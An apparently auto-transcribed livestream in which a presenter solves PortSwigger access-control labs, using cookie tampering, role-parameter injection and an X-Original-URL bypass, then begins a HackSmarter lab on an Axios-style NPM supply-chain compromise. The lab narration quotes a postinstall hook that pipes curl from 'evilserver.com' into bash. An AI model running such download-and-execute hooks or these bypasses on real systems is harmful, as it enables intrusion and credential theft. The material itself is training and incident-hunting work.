first. Okay, so this lab has an admin panel at /admin, which identifies administrators using a forgettable cookie. Forgettable cookie. Solve the lab by accessing the admin panel and use it to delete the user Carlos. You can log in with your own account using the credentials Wiener Peter. So Wiener is the username and Peter is the password. So Kubo asks, is it possible to inject something here like admin equals true or 1 equals 1? I mean, SQL injection is something that they talk about on PortSwigger. It's not this topic though. This topic is about broken access control. But in other challenges, yes, of course. Okay, so forgettable cookie, solve the lab by accessing the admin panel. Okay, we'll access the lab. And if you want to try this on your own, here's the link. Okay, so I guess what we need to do is we need to log into our own account first. So our username is Wiener Peter. And then after we're logged in, we'll try to access the admin endpoint. So we go over here, we modify this, and change it to admin. Admin interface only available if logged in as an administrator. Okay? So we're told the application identifies administrators using a forgettable cookie. So if we go back to the application and we take a look at our cookies, so go over to more tools, web developer tools and then take a look at our storage, we see here there's a cookie called admin equals false. I mean, if admin equals false, we can very easily change it over to true and then reload the page. So we should, I mean, it's not, if you're controlling whether or not users have access to admin functionality using a cookie, you can do it that way, but you just have to make sure that the cookies are not predictable. If the cookies are not predictable by any old person, then you might be able to do it that way. It's still not a great way to do it, but... Okay, set admin equals to true, and then reload the page. And then we've got access to deleting users again. Okay, doesn't the page reset with the stored data? I mean, the thing about cookies is that cookies are user controlled. So after the server sends you a cookie, you can modify the cookie and then you can resend the request. So here we can delete Carlos and then delete Wiener, and we're done. Okay, use HTTP only cookies. Yeah, I mean, there's a number of different things we can do to protect our applications. Okay, I've found websites that do that. It stopped working somehow. That's an HTTP only cookie. I mean, there's a number of different reasons why it might not work in certain applications. Every application could be coded in a different way. Sometimes it's tough to identify. Anyways, we solved this lab. Let's move on to the next one. Okay, so the next one is user role can be modified in user profile. User role can be modified in user profile. That doesn't sound very good. Okay, so this is the lab link if you want to give it a try. So this lab is an admin panel at /admin. It's only accessible to logged in users with the role ID of 2. Solve the lab by accessing the admin panel and using it to delete the user Carlos. You can log in with your own account using the following credentials, Wiener, Peter. So just like the previous level, they give us a set of credentials to use. Access the lab. Okay, so the first thing we'll do is we'll log into the application. Go to my account. And we'll log in with Wiener Peter. Okay, and after we're logged in, we should be assigned a cookie. Remember, there are 2 parts to this. It's only accessible to logged in users with a role ID of 2. So, I mean, we don't know what our current role ID is, but we know that 2 is the one we're looking for. You can go back to the lab, and then we can go to the admin endpoint. Okay, admin interface only available if logged in as an administrator. Logged in as an administrator. So one more time, we'll take a look at our cookies. I don't think the cookies are the way to solve this lab. Yeah. But we can give a URL parameter, just like what they indicated over here. Up here, so role equals 1 or admin equals true. So here we'll give a URL parameter, role equals 2. So just copy that, go over here, just tack this onto the end. So role equals 2. No, it didn't like that. Okay, I think there are 2 videos which show how to get free stuff on e-commerce websites. I mean, I'm not endorsing that. Forgetting the name, but they can serve as tutorials. We don't advocate committing crimes over here. So my account. So ID equals Wiener. My account. Now, how do we figure out what our role is? Is this the type of challenge where we need to use like Burp Suite or something? Or maybe ID equals admin. And try going over to the admin endpoint. Admin interface only available if logged in as an administrator. Okay, so user role can be modified in user profile. So if we go over to our user profile here, okay. I think we might be able to use our email submission over here to send some extra stuff. All right, so what we're going to do is we're going to use Burp Suite. Burp Suite is an advanced security tool. It's not really stuff that developers have access to most of the time. This is a very common security tool. Using powers for good. Why don't we try to? Okay, so after we've got Burp Suite started up, we can over to the proxy tab and we can open the Burp Suite browser. The Burp Suite browser is a web browser that we can funnel traffic from. Everything that the Burp Suite browser sees is going to be able to be read by Burp Suite, the program. Okay, remain in the scope. Remain in the scope, we're doing security stuff. Okay, so we're going to go over to the Burp Suite browser here. They're going to ask us to log in because we haven't logged in this browser. So we're Wiener Peter. Okay, and then what we're going to do is we're going to send our email here. So we're just going to change our email, we're going to update it, and then we're going to see if we can modify some stuff when we take a look at the request. Yeah, we need to record the traffic for Burp Suite. So now that we've made that request, we can take a look at our HTTP history. Uh-oh, my music stopped. Let me turn it back on. Okay, and we can see all of the requests that we made through the Burp Suite browser, and this is the one we're interested in, the post request. So we were told that we could modify our own user information with the post request. We'll send this over to the repeater, which lets us repeat our requests. And sleep so happy hacking, Wiener. Well, I mean, I'm the Shy Hat, but I guess on this application, we're using the Wiener user. So email test@test.com. Okay, so what we're going to do is we're going to add on an extra parameter here. So not just email, but role. So we're just going to change our role to the number 2. Just include this over here, send it off. Okay, found. So role ID. So okay. So we need to specify role ID in this case. So we'll change this to role ID and then send it off again. Okay, so we managed to successfully change our role ID while submitting our email change request. Student, hello, nice to see you here. What is up? Okay, so now that we've done that, we could probably just mosey on over to the admin endpoint because we changed our role. Okay, now we've got access as the admin user. So we can delete Carlos, delete Wiener, and we're finished. Nope says, wait, I'm a little bit confused. Okay, so I mean, we did pull out like a fancy web app security tool. So we used Burp Suite, and then we recorded some traffic. This is one of the requests that we used while we were using the web browser. We're able to modify this to include not only the email that we're trying to change in a request, but also send other parameters to change as well. PortSwigger is where you get Burp Suite? Yeah, if you go to the PortSwigger website, you can download Burp Suite there. So nope, if there's anything else that you're not quite understanding, what we're doing here is we're sending extra information with our email change request. which we saw over here. So we sent an extra parameter, which was to change our role ID, which determines whether or not we're an administrator in the system. Arrow Fick, hello, nice to see you here. What is up? And Oshania Miller, hello, nice to see you. Okay, so we solved that lab. I guess they're only going to get more complicated from here. But let's go continue to the next one. Okay, broken access control resulting from platform misconfiguration. Some applications enforce access controls at the platform level. They do this by restricting access to the specified URLs and HTTP methods based on the user's role. For example, an application might configure a rule as follows: deny post admin delete user managers. This rule denies access to the post method on the URL admin delete user for users in the managers group. Various things can go wrong in this situation, leading to access control bypasses. Some application frameworks support various non-standard HTTP headers that can be used to override the URL in the original request, such as the xOriginal URL and xRewrite URL. If a website uses rigorous front-end controls to restrict access based on the URL, but the application allows the URL to be overridden by a request header, then it might be possible to bypass the access controls using a request like this. So we send the post request, but we send it with another HTTP header, but to a restricted endpoint /admin/delete user. Okay, so let's go ahead and give this a try. URL-based access control can be circumvented. So this is a practitioner level lab, which usually means we need to use more advanced tools to solve these labs. Okay, let's fire it up. So how do you know if that endpoint exists? Well, I mean, we're told that the endpoint exists by the exercise. If we were just doing regular web app security testing, we would have to guess, or we'd have to do directory busting, or we'd have to find some other way to find those endpoints. Okay, this website has an unauthenticated admin endpoint at /admin, but a front-end system has been configured to block external access to that path. However, the back-end application is built in a framework that supports the xOriginal URL header. To solve the lab, access the admin panel and delete the user Carlos. Okay, so let's try this one. I heard a wrench works really well. Yeah, maybe. Okay, JMoney says you can send a request to that endpoint and see what the status code response is in developer tools. Yeah, I mean, there's a number of different things we could use to test security on websites. So we'll start up the lab. So we're not given a login for this one. We know that there's an unauthenticated admin panel at /admin. Okay, I'm just curious and new to this stuff. No worries. There are no stupid questions. Ask away. Okay, so admin panel is over here. And it says access denied. So we're trying to, this was a GET request to add the admin endpoint. So it tells us access denied here. We could try sending some other headers along with this request. You don't need to use a fancy tool to do this. You can do this in your web browser these days. So let's go over to more tools, web developer tools, and we'll go over to the network tab. So we'll reload the page. So we tried to send a GET request to admin. Thank you very much, Programming with Bro KC, for subscribing on YouTube. Thank you. Okay, and we can right-click on this request to the admin endpoint, and then we can edit and resend. So right-click, edit and resend, and we were told that there was that the application responds to a specific header. So it says the backend application is built in a framework that supports X original URL header. So let's use that. So we'll just copy that, and then we'll go back to here. It says the GET request to /admin. So we're just going to delete /admin, and we're going to include an extra header. So the extra header is going to be X original URL, and the value is going to be what was it, /admin. We'll see if this works. If this doesn't work, we're going to have to stick the entire URL on. So resend this. So this resulted in a 200. This resulted in a 200. Can we open it? We'll open this in a new tab. So we got access to the Hold on, what happened? Oh no, okay. This one still came back as a 200. X original URL. Let's edit this thing again. Okay, so it's the get endpoint /admin. And then we'll just copy the entire thing, and then we'll include the entire URL in X original URL here. Okay, and then send this. And this still got denied. So I'm wondering what went wrong here. Let me take a look. So let's take a look at the example. Post /X original URL /admin /delete user. So X original URL to this endpoint, delete user using a post request. Unsafe URL, is that what it said? You didn't do the delete user. We also didn't use a post request. So we might be able to change our request to post. We won't send it to admin, but we will send it to admin /delete user. We'll get rid of all this stuff. Having breakfast, no worries. Okay, I'm lost, and then I'm reading on the right where it said refer policy. Try cleaning the browser. Cleaning the browser. I don't think that's what we're looking for here. Okay, solve the lab, access the admin panel, and then delete the user Carlos. It's built on a framework that supports the X original URL header. You know what? I am gonna take a look at this in Burp Suite because it might make it a little bit more clear for me. Okay, so we're just gonna go over to the Burp Suite browser. Try to go to the admin panel here. Okay, access denied. Then we'll go over to the Burp Suite program and we'll take a look at the GET request. So once here, we can send it to the repeater so that we can start modifying this. Seemed easier to edit in Burp. Yeah. I mean, I wanted to show people how we could use it, how you could edit it in the web browser, because everybody's got access to a web browser. But it might be easier for me to do it over here. So the GET request to admin. And we'll include the header that they're looking for, which was X original URL to /admin, and we'll just send that. Okay, 403 forbidden. We'll try it like this. This came back as 200 OK, but this goes to the wrong page. No, it doesn't go to the wrong page. It doesn't go to the wrong page. It lets us get access to the admin panel. Okay, that's good. Let me see if I can do this in the web browser. So we'll try it one more time. So the xoriginal header, xoriginal URL, yeah. So we'll set this to /admin. And what did I do in here? So get to /. Okay. And we'll try sending this. Why did it say that this was? Okay, I'm going to send it as a GET request. Xoriginal URL. And when we sent this, I just need to make sure I'm not misspelling anything. So is it weird to get just an empty request? So technically it doesn't specify information, just spits info back, or what let it bypass? So the it was looking for a specific URL header. So the URL header is xoriginal URL. Let me just copy this. Sometimes copy pasting is the best way to do things. Okay, this came back. Alright, can we put this in a new tab? T17 is just subscribed on YouTube. Thank you very much. And Aromaise, I'm not too sure how to pronounce that. Thank you very much for subscribing on YouTube. Okay, so we'll get rid of this one. So we need to go to the /admin endpoint. Body payload. There's no payload here. That's okay. Well, I mean, we can solve this using Burp Suite. Not necessarily with the browser. Okay, so we need to delete the Carlos user. So this one is delete Carlos. Sorry, I need to find it in the code. So admin delete username Carlos. So we just need to tack this onto our xoriginal URL over here. And then send the request as a post request. So this is post. Actually, no, this is a GET request. This is still a GET request. So just send this off. Missing parameter username. Admin delete username Carlos. Missing parameter username. Do we need to include this in a post request then? I don't get why it didn't work in the browser. I mean, there's probably... Have you tried to look into the admin GUI in the website for the code? Missing parameter username. We might have to include the username in the host over here. Okay. Send it. Did this come back? Thank you very much for subscribing on YouTube, Felipe. Is it the soundtrack from XCOM 2? It is! You've got a good ear. You've got a good ear. This didn't go through. So username Carlos. Let's get rid of this. Missing parameter username. Okay. delete Carlos. I think what we need to do is we need to put this between some quotes, maybe? 200 OK. So this came back as 200 OK, and then we probably solved the lab. So let's go back to the lab in our Burp Suite browser. Oh, we haven't solved it. Admin delete user. Let me double check. So this stuff is to admin delete. Okay, so this is just to /admin. So let's take a look at the code. We got admin/delete username Carlos over here. This is to delete. Okay, so it should be this. Admin delete username Carlos. Send it. We might need to include this up here in the host header. Or no, in the get header over here. Okay, we'll send this. This didn't come back. Why doesn't it like this? Okay, let's put this somewhere else. Stream failed to close correctly. Put get/username Carlos and leave the header with admin delete. Yeah, I can give that a try. Get username equals Carlos, and then get rid of this stuff here. Send it off. Moses says, I'm making a web API for a backend that would serve as both the mobile app and the Next.js web app. Looking at this is making me wonder how I can secure it. I mean, I think you might want to ask a lot of different questions. So the admin endpoint, I think I'm just having problems connecting to the website now. No? Okay, let's go back. So the repeater's here. We'll go back to a successful request, this one for instance. Resend this. This came back as 200 OK. Is it uppercase admin or lowercase admin? It should be lowercase. So we've got the admin panel, admin delete username Peter, H reference, admin delete username Carlos. So one thing I'm just gonna look up something really quick. Burp Suite URL. Actually, wait. Burp Suite username parameter. let's just get like a simple thing from Google, like this, right? And before I do this, I'm just going to blank my screen for a second because the last time I tried to access Google with Burp Suite, it leaked my IP address. So I'm just going to be careful with that. Okay, so I'm just going to blank the screen for a second. So I hope I don't leak here. Just a second. Yup, it sure did leak my IP address. Hold on, I just need to take a look at... Yeah, okay. That's great. That's great, Burp Suite. Anyways. I'm going to get rid of the thing that has my IP address on it, and then I'm going to go back. I already got the coordinates, thank you. Is there really that much that someone can do with an IP address? There are things that people can do with IP addresses, so I try to be careful when I can. Okay, so we need to add it up here. So the username Carlos, we need to put it up here. The host is going to be that, and then we go to admin/delete, and then send. Found. Okay, so I think we finished the lab. Let's go back. And congratulations, to solve the lab. Okay, great. We did it. Okay, why not simply use a VPN server? I can't live stream and use a VPN server at the same time because I'm not going to be able to send my data fast enough. Aerofec. It's Google that's doing the leaking, not Burp. It's Google that's doing the... Yeah, it's Google that's doing the leaking. Well, I mean, either way, it's not great. Okay, so I think that's a real lab. A real lab. How do you define a real lab? Use a proxy chain? I mean, I'm not sure what the solution is. If I had like a fast enough connection to be able to do it through a VPN connection, I've heard that Twitch and YouTube don't like people streaming through a VPN, and they might get mad if they say that you're streaming from a VPN like IP address. No, I mean we're accessing everything through a lab right now. I think this is the last lab we're doing for this exercise, this portion of the stream. But I mean, even if something is a lab environment, the stuff from PortSwigger over here is very, very good. So we've been taking a look at this section. You cannot stream through a VPN, no, but your box could be using a VPN connection. My box could be. Yeah, that's true. Okay, so let me set up the next section for the stream. We're going to be doing 2 hours of taking a look at NPM packages and how they can be attacked. It's going to be a lot of fun. So this is going to be the last part of today's stream. It's topic number 5. Just a second, everybody. Okay, I wonder if you can set up a different node that connects to your regular ISP and just captures your screen from the hacking mode. I mean, I've been trying to figure out the best way to not leak my IP in certain ways, but every once in a while, something surprises me. And it's not very fun each time it happens. Anyways, okay, so let's go ahead and talk about the last thing we're going to be covering on today's stream. So we're going to be talking about NPM supply chain attack. This is very relevant in the news because there was a recently a big NPM supply chain attack through something called Axios. If you use Tor, the government can still find your IP. I mean, people talk a lot about whether or not using Tor is secure. It's not really up for me to say, because I'm not really an expert. Isolate the box by having it on a different network from the streaming machine. A different network from the streaming machine. That might be, that might be the way to go. Okay, so let's talk about this. Oh, sorry, gotta start my timer. Okay, start the timer. Tor's purpose was not to hide from all the governments. Just use an anti-detect browser? Okay, so if anybody's wondering, we're currently using HackSmarter.org. HackSmarter is a smaller cybersecurity platform, but I like their stuff. I like the stuff they have on here. They've got a lot of good materials. Let's talk a little bit more about HackSmarter, the platform, before we get started. So they've got a bunch of different modules that you can learn cybersecurity through. For example, they've got stuff on Active Directory. They've got web app stuff. Oh, this is more Active Directory. They've got quite a few Active Directories modules. They've got specific modules on Active Directory evasion techniques, I guess, over here. And they've got a bunch of modules on specific technologies, such as Git and what is it? What are they called? Prototype pollution, race conditions. So there's a handful of modules that are free, and there are other ones that are either paid on a monthly subscription or you pay for the entire module. There are quite a number of nice free modules on here as well. Okay, Onion is really smelly. Tor was literally to hide from governments by the Navy or to talk some secret stuff. I think Tor was developed by the U.S. by some branch of the U.S. government. But yeah, I mean, I don't really use it because I'm not really a person who needs to use it. But anyways, let's move on to the topic. So we're talking about NPM supply chain attacks. So we got our course content, and I'll be narrating what's going on. So introduction. Modern software isn't written from scratch, it's assembled. When a development team builds a new web application, they pull in thousands of pre-written code blocks from third-party developers to handle everything from routing network traffic to generating random numbers. But what happens when the code you inherently trust is infected before it even reaches your computer? Welcome to this guided lab on NPM supply chain attacks. In this lab, we're going to explore how attackers are bypassing multi-million-dollar perimeter defenses by poisoning the open source libraries developers rely on every single day. So what will we cover? The theory. We'll break down the mechanics of a supply chain attack, what NPM, Node Package Manager, is, and how attackers abuse built-in package features to achieve instant silent code execution on the victim's machine. We'll do a case study. We'll analyze a massive real-world attack that recently targeted Axios, one of the most popular networking libraries in the world. This was used to deploy a hidden remote access Trojan, otherwise known as a RAT, to developer endpoints. We'll do a hands-on investigation. Theory is great, but practice is better. We have provided an Ubuntu VM that has been intentionally compromised using the exact mechanisms from the recent Axios attack. You will jump into the terminal to hunt down the active beacon, uncover the attacker's persistence mechanism, and trace the infection back to patient 0. And we'll do incident response. Finally, we'll cover the playbook for containing a compromised developer machine and secure your pipeline against further threats. Okay, so complete and continue. So, poisoning the well. So think about how you'd break into a highly secure bank. You could spend months trying to crack their firewalls, bypass their alarms, and dodge their security guards, or you can get a job at the company that manufactures their safes and quickly slip a master key into every single lock before it even ships. That second method, this is called a supply chain attack. So an attacker gets backdoor access to a third-party vendor, and then the targeted organization accesses the third-party vendor, and the attacker is able to get access to the targeted organization through the third-party vendor. Instead of attacking a target directly, hackers compromise a trusted third-party vendor or a piece of software that the target relies on. If an attacker can inject malicious code into a popular software update or a widely used code library, they don't just compromise one company, they compromise everyone who downloads it. In this lab, we're going to take a look at one of the most heavily targeted supply chains in the world, the JavaScript ecosystem. Okay, Austin, Illinois says you could just plug in a USB stick, then walk away with a keylogger, then sell off the information. I mean, I hear that a lot of companies don't allow anybody to plug in devices through their USB ports. They just lock down the USB port so that they can't be used. So what type of an attack targets a third-party vendor instead of the main target? That's a supply chain attack. Okay, complete and continue. Okay, what is NPM? If you've ever written JavaScript or used Node.js, you know NPM, the Node Package Manager. It is the default package manager for Node.js and is the largest software registry in the world, hosting over 2 million packages. That's hilarious because I worked at UPS and all of their USB ports are exposed. We want UPS to know nothing Well, the developers are lazy in a good way. If you need your app to parse a URL, generate random colors, or handle user authentication, you don't write that code from scratch. You just run npm install package name, and npm downloads the code created by someone else directly into your project's node modules folder. So, I mean, everybody uses prepackaged software, and if there's bad people behind the prepackaged software, then you're in big trouble. Okay, a typical modern web application might rely on hundreds of direct packages, which in turn rely on thousands of other packages or dependencies. So the danger is you are inherently trusting the maintainers of those thousands of packages that they haven't been hacked, or haven't sold their project to a shady buyer, and haven't gone rogue. What does NPM stand for? That's the Node Package Manager. Very eye-opening to learn this stuff. I mean, it's very shocking when you think about it, because we assume that all of the stuff that we're importing into our code bases is secure. I mean, for example, I might be writing some Python code, and I might import requests, and then I do request.get some URL over here. If for some reason the request module in Python has been compromised, then people might be able to create a backdoor into my system through the request module because I ran it on my server. Okay, hasn't XZ been attacked? Yup, it was attacked, but it didn't really go anywhere before it was discovered. I build multi-agent AI systems and I build web app stuff, and I'm trying to learn this side. Thinking about how easy it would be to automate what you do with agents is scary. I mean, I can guarantee you that the AI isn't really thinking. The AI agents aren't really thinking of supply chain compromise either. So you have to be really careful how you deploy your AIs. What is the name of the directory where npm installs these third-party packages? Is it what is it called? Node modules. No, but the humans behind it are, and that's the point. Maybe. Okay, anatomy of an attack. So how does an NPM supply chain attack actually happen? It usually goes down in one of three ways. Typo squatting. The attacker publishes a malicious package with a name slightly off from a popular one. So electorn instead of electron. Then they just wait for the developer to make a typo. And then they can do account takeover. The attacker phishes or cracks the password of a legitimate package maintainer. Then they push a minor update to the real package that includes malware. Okay, and they can do protestware rogue maintainer. The actual creator of the package intentionally pushes destructive code to make a political statement or out of frustration. That's pretty scary. I hope you have ports shut on your firewall. Well, I mean, I don't generally expose any of my machine's ports to the internet. So the mechanism in this case is post install. The most dangerous feature in NPM is the post install script. Just inside a package's package.json file, a developer can define scripts that run automatically the moment the package is downloaded. An attacker can simply add this line to the compromised package, post install curl http://evilserver.com curl bash. It's happening, everybody. It's curl into bash. Evil maintainers. What are open ports? I mean, open ports are the ports that are open on your server, and usually these open ports are hosting some sort of service, but they just might be open for no real good reason. An open port is a welcome party to hackers. Let's party. I was joking, I know it's 0000. That's all the interfaces. So a second, developer types in npm install, and then the bash script executes with the permissions of the user. Game over. So what technique involves registering fake packages with names similar to popular ones? So this is typo squatting. I mean, we're talking about what you're talking about is which interface you're going to be exposing the ports to. So 0000 is like every interface on the system. I mean, we're talking about interfaces over where? Over here. So these are all of my interfaces. So this IP range, this IP range, this IP range. If you specify 0000, it's all of the interfaces. Okay, what NPM script feature is commonly abused to execute code automatically upon installation? So that one is the post install. Post install. Okay, complete. So case study, the Axios compromise. So we can learn more about Axios here. Researchers discovered a highly sophisticated attack targeting Axios. If you aren't familiar, Axios is a promise-based HTTP client for Node.js. It's essentially the plumbing of the modern web. It's the tools developers use behind the scenes to let apps talk to the internet. For example, fetching messages from a server or submitting a login form. It has up to 100 million weekly downloads. Even if you don't install it directly, if you use React, Vue, Angular, or Electron, Axios is likely buried in your dependency tree. Okay, Austin, I hope I see you back. Is this going to explain how the maintainer was compromised? I think so. Okay, the attack vector. The attackers didn't exploit a vulnerability in Axios' code. Instead, they compromised the credentials of the lead maintainer. So how did they get the lead maintainer's credentials? Using this access, they published poisoned packages directly to NPM, Axios version 1.14.1, and Axios 0.30.4. Okay? Note that these versions were never officially tagged on the project's GitHub. They only existed on the NPM registry. The execution. When a developer ran npm install and pulled down one of those malicious versions, the package quietly injected a brand new hidden dependency called plain crypto.js. version 4.2.1. This fake crypto package utilized the exact post-installed technique we learned about. Upon installation, a script, setup.js, is automatically executed, downloading an obfuscated dropper. This dropper then pulls down a platform-specific remote access Trojan, or otherwise known as a RAT, tailored for macOS, Windows, or Linux. So most of the time, malware doesn't target more than one operating system, but the more sophisticated types of malware will target Windows and Linux and macOS, or any combination of these. Target and impact. So the attackers weren't targeting the end users visiting web apps built with Axios. The infection path was the build step. The rat was designed to compromise the developer's machines, hunting down exposed secrets like cloud infrastructure keys, repo deploy keys, and NPM tokens. Okay, so let's see. I talked about this with the AI and showed it the code, and it thinks it was partially AI generated and human guided. Well, I mean, everybody's using AI to generate code these days, huh? Cyber rats? Yeah, well, I mean, yeah. Okay, if a developer installed this, their machine was fully owned, giving attackers the keys to the backdoor future software releases across countless other companies. Auto-deletion. What makes the attack terrifying is its stealth. The malware dropper was designed to clean up after itself. Once the rat was installed, it wiped the post-install script and the setup.js file from the node module's plain crypto.js package.json manifest. Okay, study bloggers ask, is vibe coding good? I mean, vibe coding is good if you know the language that you're vibe coding in, and it's very, very bad if you don't know the code that you're vibe coding in. I mean, there are famous people who have done vibe coding, like Linus Torvalds, the inventor of Linux. He's been doing vibe coding, and he thinks it's he's talked about how it's pretty good, but he's also very, very good at coding in the languages he codes in. Alright, so what were we talking about? So if an incident responder ran NPM audit or manually reviewed the directory after the fact, it would look completely clean. Catching this requires hunting for specific indicators of compromise on the host operating system or the network perimeter. Okay, so JMoney says you can code with AI, but you still need to know programming fundamentals. You need to know the verbiage to make the prompts to get the good code, and you need to be able to read and audit the code. So if you don't already know how to code, vibe coding is dangerous. So a full timeline of the attack is below. Check out their article. So March 30th, a clean version of the package plain crypto is published. So about a day later, a new version with the payload added is published. So they didn't add the malicious code in the initial version of the package. Okay. So a new version of Axios that injects plain crypto.js as a runtime dependency is published using the compromised Jason Sayman account. Thank you very much, Brenton C. Tying Viesna, and Felipe for subscribing on YouTube. Thank you very much. Vibe coding your own pentest tools as code is cool. Okay, so it's dangerous if you're going to make a social network and just post it on the internet. You'll end up with Maltbook. You'll end up with What happened to Maltbook? I don't even know. Okay, so what is the name of the hidden dependency injected by the poisoned Axios packages? The hidden dependency, what was it called? Plain crypto.js? Okay, what type of malware was deployed to the developer's machines? So it was a remote access Trojan? It was a rat? Okay, it was a rat. Plain text credentials. Where was plain text credentials mentioned? True or false, end users visiting a website built with compromised Axios versions will be infected by the malware. End users visiting a website built with compromised Axios versions? No. So it's not people visiting a website that was built using Axios. It was the developers who are using Axios. So this is false. Thank you very much for subscribing, Matias Santos Viana. Thank you. Okay, because the malware cleans up its tracks in the package manifest, what NPM command will fail to detect the compromised post-infection? So I think it was like NPM audit. Okay, that's correct. Great. VXX, hello, nice to see you here. Okay, so we'll do our hands-on investigation. So launch the lab, then connect when the machine is ready. No VPN is needed. No VPN is needed. Are you going to expose my IP address again? Okay, if a CPU is starting to die, you can always underclock it to squeeze the life out of it. I mean, it also means that your CPU will run even slower than usual, yeah? Okay, so Maltbook suffered a critical security failure when its database was left publicly accessible, exposing over 1.5 million API keys, login tokens, and email addresses stored in plain text. That's frightening. Okay, so let's launch. Okay, step 1, network analysis. Malware is useless if it can't phone home. The attacker's remote access Trojan is actively trying to establish a connection to their command and control server, so the C2. We can view all active and outbound network traffic using netstat or SS. This is a beacon so you can monitor continually with this command, netstat, grep, and then look for SSH. What was the timeline? It only shows the publishing of the malicious package, so the attack is still ongoing. Well, I mean, I'm pretty sure the attack is over. Deefus, hello, nice to see you here. What is up? Let's give you a fun Nyan Cat. Welcome to the stream. Well, I mean, I can quickly take a look at the timeline over here. So the timeline says March 30th. I mean, this happened just a few days ago. So March 31st, a new version of Axios that injects plain crypto.
Is this a hacking?
Is this a hacking? Anytime you do stuff on the terminal, you're doing a hacking, yeah. Okay, so a new version of Axios that in plain. So okay. So the malicious version of Axios that the attackers intended people to use was published on March 31st. Melvin Patmon, thank you very much for subscribing on YouTube. So I mean, we can probably get better information from this article over here that talks about Axios. I don't know. So you know what? So Axios supply chain attack. Let's ask our good friend the AI when it was discovered. When was the Axios NPM supply chain attack discovered? It says the full timeline. It says the full timeline, not even half the timeline. The NPM supply chain attack was discovered and reported on March 31st. I mean, it was the same day. It was the same day that they pushed the malicious package. It's so insane that the guy just didn't notice packages published on his repo as well. I mean, hard to say. Cool asks, what's up after that AI thing going on with TryHackMe? Did you drop them as well? I mean, I didn't drop TryHackMe. The reason is because it's kind of hypocritical to drop TryHackMe and not drop Google and not drop Amazon and not drop Facebook and not drop Twitter. Because if you cut out every big company that does evil stuff, then you're not left with anything to use. Okay, Hunters picked it up something like 89 seconds after it launched. It was online for about 2 hours. Yeah, I did hear that John Hammond's company picked it up. So discovery timeline. Yeah, it talks about Huntress over here. Socket and Huntress flagged the malicious activity within minutes of the packages being published. But the premise, though, didn't TryHackMe say that they wouldn't do it. I don't know. That's not my battle. I mean, the other problem with boycotting TryHackMe is that there's no real alternative that has a lot of free stuff. And one of the reasons why I use TryHackMe is that they've got a lot of good materials that are free. There's nothing that quite does what TryHackMe does. If you want to say that, don't give TryHackMe money, then I'm not giving TryHackMe money. But the thing is that they're selling courses to teach pen testing, then using the info that they gathered from us to use it on non-humans in a pen test product. I mean, yeah. If you're... I understand the concern. I also understand that that people get a lot of value out of TryHackMe service. So you have to ask yourself whether or not it's worth it. Same thing with with other big companies that are doing bad stuff. Outside is foggy. Depends on where you are. But yeah, let's continue on with the thing. I mean, I'll support. I support HackSmarter. I think that his stuff is really good, and I think I like pointing out to people, where the platforms are good. Okay, a lot of rich people are dumping money into scientific research, but about reversing aging. They did it in mice, but it worked. Of course, it caused cancer. Reverse aging but cause cancer. I guess that's a double-edged sword right there. I mean, I guess if you can cure the cancer, then maybe. All right, so let's continue on. Okay, we've got ads running on Twitch right now, so I'll take a little ad break. But in the meantime, why don't you check out my favorite video? So my favorite video is this one with the baby birds. Well, they're not baby birds, they're fledgling birds. But enjoy the music, enjoy the birds. We'll be back in about 60 seconds when the Twitch ads have finished. Got 20 seconds left. So this is my favorite time of the year because the birds are having babies right now, and I'll get to see lovely, cute fledgling stellar jays like these ones in a month or two. Anyways, let's get back to the hacking stuff. Someone else who enjoys the fine delight of bird watching. Yeah, I'm a big fan. Okay, so click launch and connect when the machine is ready. No VPN is needed. No VPN is needed. That seems a little bit weird. Why would I not need a VPN for something that's hosted on their internal network? Click launch and then click connect. Okay, click on connect. Oh. Oh, okay. All right. This is good. I'm pleasantly surprised that my IP wasn't leaked. Thank you. All right, so we're in a terminal. Have you ever tried bug bounty? I mean, these are Canadian birds, but what region are they from exactly? You can find these kind of birds all over the western, for anywhere from the central to the western portions of the United States and Canada. Okay, can I make this bigger? Because it seems a bit small. Nope, can't make it bigger. That's unfortunate. Because it's really hard for you guys to read this, but maybe we don't need to pay too much attention to this. So the guided lab, network analysis. Okay, malware is useless unless it can phone home. Are we wrapping up? Did I arrive late or too late? No. We're doing the NPM compromise lab over here, over at HackSmarter. Control plus scroll. Control plus scroll? I'll give it a shot. Control plus scroll. Well, all my usual methods aren't working here. But that's okay. We won't focus so much on the console. Okay, you might need to run it with sudo to see all the process names. Run the sudo su to switch over to the root user. Okay, well, let's do that. And then we'll run this command. We can view all the active and outbound network connections using netstat, so they give us a handy-dandy command to use. Let's do that. I hope I can paste in. If I can't paste into here... Oh no, I can't paste into here. This is horrible. This is... Okay. Well, I guess I'm gonna have to just type it out. Netstat antp pipe into grep dash capital E syn sent established. And what was the rest of it? And then grep into grep vssh. Nothing appears. Nothing appears. Okay. And that's not the whole command, is it not? Hold on. So netstat antp grep e sent established grep v ssh. Wait, does netstat even work here? Netstat. So netstat works. This doesn't work though. So we got established. You don't need the whole command. Let's just highlight the exact thing you want. Okay, so we got established. So we just... I mean, there's not very much here. Why would we need that whole long command? Okay, what are we actually supposed to be paying attention to here? Look for an outbound connection to an unfamiliar IP address on port 443. Okay. Port 443. There's nothing here on port 443. Am I not getting something? Okay, what's going on? What are we doing tonight? So we're currently doing the last part of the stream, which is taking a look at the NPM compromise. We've got a lab and stuff to take a look at. It's over here. Verify the interfaces. Wireshark. Okay, so what do they want us to do? So we connected to the machine. Click launch and then click connect when the machine is ready. No VPN is needed. So, You need to run it with sudo to see all the process names. So I mean, we are running as the root user right now. So I don't understand why we don't see all the processes. And we don't see the malicious connection here either. SSTLP. How about some PSAUX? You know what? I think I might want to restart my machine, because something tells me that LSOF I443. I'll give it a try. Oh, there is something here. It's a Python command. I wonder why it didn't show up in the other commands. So hold on, what am I looking for here? What is the malicious IP address that the machine is attempting to communicate with? So I guess it would be, go back to the terminal and look for 443. So 10.0.17.71. Give it a try. No. Look for an outbound connection to an unfamiliar IP address on port 443. It did show up. Hold on. So am I... This is the only IP address. Type the previous command. So the previous command is... We're looking for netstat. Oh, okay. Why didn't I see this? Alright, everybody. I need to get my eyes checked. 142.11.206.73. Okay. And then... Wait, this is still incorrect? Did I copy the IP address incorrectly? Oh, okay, I did. So this is supposed to be 142. It's harder for us to see too, so you have to pay closer attention. Yeah, true. It's one of these weird terminals where you can't really, well, I mean, I can't really do anything but type. I can't paste, I can't paste, I can't copy, I can't do anything. And I can't make it bigger. Okay, continue. Okay, step 2, process monitoring. Now that you've spotted the outbound connection, look at the far right column of the netstat output. It should give you a process ID and a program name like Python 3. Let's see exactly what the process is doing. We can list all the running processes and filter for Python scripts using PSAUX 